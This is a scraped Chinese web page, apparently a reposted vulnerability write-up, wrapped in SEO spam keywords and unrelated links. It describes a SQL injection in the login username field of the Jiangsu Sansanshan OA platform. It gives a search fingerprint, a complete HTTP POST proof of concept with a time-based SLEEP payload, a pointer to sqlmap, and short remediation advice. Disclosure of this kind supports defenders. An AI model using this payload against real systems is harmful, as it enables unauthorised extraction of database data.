当前位置: 首页 > news >正文

godaddy 建网站刚刚上海重大宣布

godaddy 建网站,刚刚上海重大宣布,个人养老金制度将推,wordpress彻底禁用google0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台#xff0c;主要有知识管理#xff0c;工作流程#xff0c;沟通交流#xff0c;辅助办公#xff0c;集成解决方案#xff0c;应用支撑平台#xff0c;基础支撑等功能。 该系统也与江苏叁… 0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台主要有知识管理工作流程沟通交流辅助办公集成解决方案应用支撑平台基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下username对接受的传参没有进行严格的过滤从而导致SQL注入攻击者可以利用该漏洞获取数据库敏感信息。 0x02 影响版本 江苏叁拾叁-OA 0x03 语法特征 app江苏叁拾叁-OA 0x04 漏洞复现 页面   POC(payload sqlmap梭哈来的) POST /login HTTP/1.1 Host: Content-Length: 93 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Connection: closeusernameadmin AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND AUxOAUxOamp;passwordadmin 直接sqlmap梭哈来   0x05 漏洞修复建议 使用参数化查询对用户输入进行验证和过滤限制数据库账户权限更新和打补丁
http://www.w-s-a.com/news/978628/

相关文章:

  • 湖南网站建设哪里好做ppt的网站叫什么名字
  • 容城县建设银行网站电子商务网站建设子项目
  • 网站管理助手3.0做淘宝网站用什么软件做
  • 贵阳做网站的公司wordpress趣味插件
  • 自己设置免费网站设计平台南京哪里有做公司网站的
  • 建设公司内网网站的意义自助建站网站的宣传手册
  • 手机建设中网站建立个人网站服务器
  • 网站开发工程师岗位概要网站怎么制作教程
  • 城乡建设主管部门官方网站公司简介模板ppt范文
  • 网站认证必须做么cc0图片素材网站
  • net域名 著名网站国外设计案例网站
  • 淘宝客网站哪里可以做app地推网
  • 宜昌建设厅网站中国最新时事新闻
  • 微网站怎么开发wordpress 发表评论
  • 山东网站建设是什么一页网站首页图如何做
  • 游戏开发与网站开发哪个难万网影
  • 做网站编程语言建筑施工特种证书查询
  • 找人做网站内容自己编辑吗修改wordpress登陆界面
  • 登陆建设银行wap网站湖南网站建设磐石网络答疑
  • 58网站怎么做浏览度才高论坛网站怎么做排名
  • wordpress 手机网站支付京东网站建设的经费预算
  • 自己怎么样做游戏网站做海外贸易网站
  • 建立什么样的网站好制作网页网站代码
  • 岳麓区专业的建设网站公司尚一网常德论坛
  • 电商网站建设实训报告360站长平台链接提交
  • 个性化网站建设公司个人网站备案类型
  • 腾讯建站模板上海网站开发有限公司
  • 网站和小程序的区别请问做网站怎么赚钱
  • 网站logo设计免费版在线网站开发建设准备工作
  • wordpress多站点 主题南京做网站好的公司